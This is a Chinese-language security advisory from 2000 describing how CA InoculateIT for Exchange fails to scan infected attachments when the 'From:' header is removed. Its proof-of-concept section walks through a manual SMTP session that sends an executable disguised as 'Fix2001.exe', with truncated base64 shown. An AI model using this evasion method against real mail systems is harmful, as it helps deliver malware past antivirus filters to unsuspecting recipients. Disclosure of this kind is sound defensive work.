xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

CA InoculateIT MSExchange代理存在漏洞


发布时间:2000-11-14
更新时间:2000-11-14
严重程度:
威胁程度:隐蔽攻击
错误类型:设计错误
利用方式:服务器模式

受影响系统
Computer Associates InoculateIT 4.53
   + Microsoft Exchange Server 5.5
      - Microsoft Windows NT 4.0
      - Microsoft BackOffice 4.5
         - Microsoft Windows NT 4.0
详细描述
InoculateIT 4.52是一个流行的面向EXCHANGE SERVER的反病毒软件,
其中存在一个漏洞可以允许本地攻击者让病毒穿过代理和MS EXCHANGE 服务器,
其中有多个方法可以绕过这个限制,其中之一就是在感染的信息中去掉"From:"栏,
并发送信息到EXCHANGE SERVER,InoculateIT 4.52不会探测到感染的文件。

测试代码
1,获取一信息包含任何感染的附带的MIME编码文件,我简单的通过EX来输出到c:\TurfDir,
从外面发送到EX服务器;
2,使用notepad.exe来编辑文件并去掉"From:..." 头如:
Remove this line: From: Test <Test@abc.com.br>
To: Joe Bob <jbob@xyz.com.br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA...

3,拷贝notepad的内容到剪贴板。
4,发送"telnet your_exsrvr 25" 命令

220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail
Service 5.5.2650.21) ready
helo
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<jbob@xyz.com.br>
250 OK - Recipient <jbob@xyz.com.br>
data
354 Send data. End with CRLF.CRLF

下面是从剪贴板粘贴的内容:

To: Joe Bob <jbob@xyz.com.br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA...

250 OK
quit
221 closing connection

5,信息发送,CA代理将不会检测到感染的文件。

解决方案
尚无

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved